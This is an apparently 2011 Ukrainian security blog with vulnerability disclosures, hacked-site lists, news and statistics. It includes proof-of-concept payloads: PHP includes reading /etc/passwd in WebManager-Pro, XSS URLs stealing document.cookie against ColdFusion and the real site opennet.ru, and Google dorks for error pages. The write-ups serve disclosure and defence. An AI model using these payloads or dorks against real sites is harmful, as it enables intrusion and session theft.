RCE та CSRF уразливості в CMS WebManager-Pro

15:10 29.01.2011

19.11.2010

У серпні, 03.08.2010, я знайшов Remote Code Execution та Cross-Site Request Forgery уразливості в CMS WebManager-Pro. Дані уразливості я виявив на різних сайтах на CMS WebManager-Pro від FGS_Studio. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в CMS WebManager-Pro.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

29.01.2011

RCE (Remote PHP Code Execution):

В cистемі можливе включення php тегів безпосередньо в поля для текста контенту. Таким чином на будь-яку сторінку (в полі “Текст”) можна включити php код, який виконається при відвіданні сторінки. Атаку можна провести при доступі до адмінки, або при CSRF-атаці на адміна.

PHP код задається наступним чином:

<?php include "/etc/passwd"; php?>
<?php include "script.php"; php?>

CSRF:

В edit_content.php не перевіряється джерело запиту, що дозволяє проводити CSRF атаки для зміни контенту будь-якої сторінки сайта. Що також може бути використано для проведення persistent XSS атак та для віддаленого виконання коду (RCE).

Уразливі CMS WebManager-Pro v.7.4.3 (версія від FGS_Studio) та попередні версії.

Тестування з веб безпеки

22:43 28.01.2011

Оновив сьогодні тестування з веб безпеки, в якому ви можете перевірити рівень своїх знань з веб безпеки.

В даній версії додав 10 нових запитань по восьомому розділу мого Посібника з безпеки. Тепер у тесті 65 запитань на web security тематику, які базуються на восьми розділах мого посібника.

Також сьогодні оновив друге тестування з веб безпеки, в якому ви можете перевірити рівень своїх хакерських знань. В даній версії додав 5 нових запитань.

Так що вдалого вам тестування ;-) .

Новини: кіберзагрози на 2011 рік, спецслужби та взлом сайта ChronoPay

19:20 28.01.2011

Пропоную вашій увазі добірку цікавих новин на тему безпеки.

За повідомленням www.xakep.ru, McAfee склала список кіберзагроз на 2011 рік.

Експерти американської компанії по розробці антивірусного програмного забезпечення McAfee склали список найбільших кібернебезпек, з якими ризикують зіштовхнутися користувачі в 2011 році. У список увійшли:

  • Соціальні мережі, у які користувачі викладають величезну кількість особистої інформації.
  • Багатофункціональні мобільні пристрої, що одержали широке поширення в бізнесі-сфері.
  • Крім того, експерти пророкують значне збільшення атак на продукти компанії Apple - iPhone і iPad.
  • Також не варто скачувати на мобільні пристрої сумнівні додатки.
  • Ще одну небезпеку McAfee бачить у популярності WikiLeaks.

За повідомленням hackzona.com.ua, спецслужби дісталися до експерта з кібербезпеки.

ZDNet намагається дізнатися хоч що-небудь про нинішнє місцеперебування та стан відомого експерта з кібербезпеки Данча Данчева. Напарник Данчева по блогу Zero Day, що належить цьому виданню, Райан Нарайн повідомив, що не може вийти на зв’язок з колегою вже кілька місяців. В своєму останньому листі експерт заявив про те, що його, по всій видимості, переслідують болгарські спецслужби.

За повідомленням www.xakep.ru, взломаний сайт ChronoPay.

Наприкінці грудня сайт міжнародної процесінгової системи ChronoPay взломаний зловмисниками. Хакери розмістили на головній сторінці повідомлення про нібито викрадання баз даних з персональною інформацією про клієнтів ChronoPay, що мало місце, включаючи номера банківських карт. Скріншот повідомлення на взломаному сайті надається.

Добірка уразливостей

15:14 28.01.2011

В даній добірці уразливості в веб додатках:

  • Sun Java JDK/JRE AWT Library Invalid Pointer Vulnerability (деталі)
  • Sun Java JDK/JRE AWT Library Invalid Index Vulnerability (деталі)
  • Sun Java JDK/JRE Soundbank Resource Parsing Buffer Overflow (деталі)
  • XSS in Horde IMP <=4.3.7, fetchmailprefs.php (деталі)
  • FreePBX recordings interface allows remote code execution (деталі)
  • Sun Java JDK/JRE Soundbank Resource Name Buffer Overflow (деталі)
  • Oracle Java Runtime Environment Image FIle Buffer Overflow Vulnerability (деталі)
  • SQL Injection and XSS in Motorito < v2.0 Ni 483 (деталі)
  • CollabNet Subversion Edge Log Parser XSS/Code Injection Vulnerability (деталі)
  • SQL injection vulnerability in Entrans (деталі)

Уразливості в Adobe ColdFusion

23:53 27.01.2011

В 2008 - 2010 роках я знаходив уразливості на багатьох сайтах на ColdFusion. Це SQL DB Structure Extraction, Full path disclosure та Cross-Site Scripting уразливості. В останнє я виявив подібні уразливості на www.sec.ru.

Вони мають місце на сторінці детального повідомлення про помилку (що часто виводиться на ColdFusion сайтах). І враховуючи те, що ці дірки відносяться до Adobe ColdFusion, 16.11.2010 я приватно повідомив про це Adobe, але вони проігнорували моє повідомлення. Тому я оприлюднюю детальну інформацію про уразливості.

SQL DB Structure Extraction:

http://site/page.cfm?id=-

Виводиться інформація про SQL запит (якщо даний веб додаток працює з СУБД).

Full path disclosure:

http://site/page.cfm?id=-

Виводиться повний шлях на сервері.

XSS:

При запиті до сторінки http://site/page.cfm?id=- з User-Agent “Mozilla<body onload=alert(document.cookie)>” можна було виконати код. Уразливість працювала в 2009 та 25.02.2010, зараз вона вже виправлена (вірогідно в останніх версіях ColdFusion).

XSS:

http://site/page.cfm?id=%3Cbody%20onload=alert(document.cookie)%3E

Вектор через тег script, що працював в 2009 та 25.02.2010, вже виправили в останніх версіях ColdFusion, але можна атакувати через багато інших векторів (наприклад, через тег body).

Уразливі потенційно всі версії Adobe ColdFusion.

Похакані сайти №131

22:40 27.01.2011

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://www.tk-kiev.com.ua (хакером Down Twon HaCkEr) - 14.01.2011, зараз сайт вже виправлений адмінами
  • http://www.lie-detector.biz (хакерами з Albanian Hackers Group) - 20.01.2011, зараз сайт вже виправлений адмінами
  • http://shop.zdravnik.com.ua (хакером blood black)
  • http://15workdaily.com (хакером Dr.TaiGaR)
  • http://blog.arm-eko.rv.ua (хакерами з AHC)

Зазначу, що взломаний сайт 15workdaily.com - це e-commerce сайт з логотипами Verified by VISA, MasterCard SecureCode та VeriSign Secured. Про діряві сайти, що ховаються за секюріті логотипами я вже писав в статті Справжня безпека сайтів із секюріті логотипами, а це наочний приклад хакнутого подібного сайта.

Нові уразливості на www.opennet.ru

15:29 27.01.2011

14.06.2010

У листопаді, 05.11.2009, я знайшов Cross-Site Scripting уразливості (в тому числі persistent XSS) на секюріті проекті http://www.opennet.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на opennet.ru.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

27.01.2011

XSS (persistent):

При доступі на сторінку http://www.opennet.ru /cgi-bin/opennet/bookmark.cgi?submit=add з заголовком:

Referer: http://www.opennet.ru/"><script>alert(document.cookie)</script>

Або через GET запит:

http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?url=http://www.opennet.ru/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&title=1&submit=%E4%CF%C2%C1%D7%C9%D4%D8

Сберігається “закладка” (для даного користувача). Код спрацьовує одразу, а також при заході на сторінку http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi.

Дані уразливості вже виправлені, але даний захист можна обійти використовуючи наступну Strictly social XSS:

Strictly social persistent XSS:

http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?url=javascript:alert(document.cookie)//http://opennet.ru&title=1&submit=%E4%CF%C2%C1%D7%C9%D4%D8

Сберігається “закладка” (для даного користувача). Код спрацьовує при кліку на сторінці http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi.

XSS:

http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?title=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

З даних уразливостей все ще не всі виправлені.

Інфікованість Уанета за останні роки

22:48 26.01.2011

Починаючи з 2008 року я став проводити дослідження інфікованості сайтів в Уанеті та наводити інформацію про це в своїх звітах про хакерську активність в Уанеті. Наведу порівняльну статистику інфікованості Уанета за останні роки.

Статистика буде за 2008 - 2010 роки враховуючи, що лише з 2008 я веду статистику інфікованих сайтів. Статистичні дані базуються на моїх дослідженнях хакерської активності в Уанеті в 2008, 2009 і 2010 роках.

За весь 2008 рік в Уанеті було інфіковано 4 веб сайти.

За весь 2009 рік в Уанеті було інфіковано 67 веб сайтів.

За весь 2010 рік в Уанеті було інфіковано 264 веб сайтів.

Інфіковані сайти в Уанеті

Збільшення заражених сайтів свідчить про зростання кримінальних взломів сайтів (коли на взломаних сайтах розміщуються віруси).

Динаміка зараження сайтів в Уанеті.

В 2009 році активність зросла на 1575% порівняно з 2008 роком (зростання в 16,75 рази).

В 2010 році активність зросла на 294% порівняно з 2009 роком (зростання в 3,94 рази). В порівнянні з 2008 роком активність зросла на 6500% (в 66 разів).

Динаміка зараження сайтів в Уанеті

Як видно зі статистики, кількість інфікованих сайтів в Уанеті в останні роки стабільно зростає.

“Error” Google хакінг №2

19:04 26.01.2011

Продовжу тему “Error” Гугл хакінга (”Error” Google hacking). Котрий є різновидом Гугл хакінга - використання пошукових систем (зокрема Гугла) для пошуку уразливостей на сайтах.

Дана методика передбачає використання Гугла (чи інших пошукових систем) з метою пошуку повідомлень на сайтах про помилки, і дозволяє знайти важливу інформацію стосовно даних сайтів. За допомогою спеціальних пошукових запитів (дорків) можна знайти Full path disclosure та Information leakage уразливості на різноманітних сайтах в Інтернеті.

Новий перелік “еррор” пошукових запитів:

“Fatal error”

“Fatal error: Call to undefined”

“Fatal error: Call to undefined function”

“Fatal error: Call to undefined method”

“Fatal error: Call to a member”

“Fatal error: Call to a member function”

“Fatal error: Allowed memory size”

“Parse error”

“Parse error: syntax error”

“Parse error: parse error”

Добірка уразливостей

15:10 26.01.2011

В даній добірці уразливості в веб додатках:

  • Sun Java Runtime CMM readMabCurveData Remote Code Execution Vulnerability (деталі)
  • Sun Java Runtime Environment MixerSequencer Invalid Array Index Remote Code Execution Vulnerability (деталі)
  • Sun Java Runtime Environment JPEGImageReader stepX Remote Code Execution Vulnerability (деталі)
  • Free Simple CMS path sanitization errors (деталі)
  • Sun Java Runtime Environment Trusted Methods Chaining Remote Code Execution Vulnerability (деталі)
  • Sun Java Runtime Environment MIDI File metaEvent Remote Code Execution Vulnerability (деталі)
  • Sun Java JDK/JRE Unpack200 Buffer Overflow Vulnerability (деталі)
  • Reflected XSS in Atmail WebMail < v6.2.0 (деталі)
  • TimeTrack 1.2.4 Joomla Component Multiple SQL Injection Vulnerabilities (деталі)
  • BSI Hotel Booking System Admin Login Bypass Vulnerability (деталі)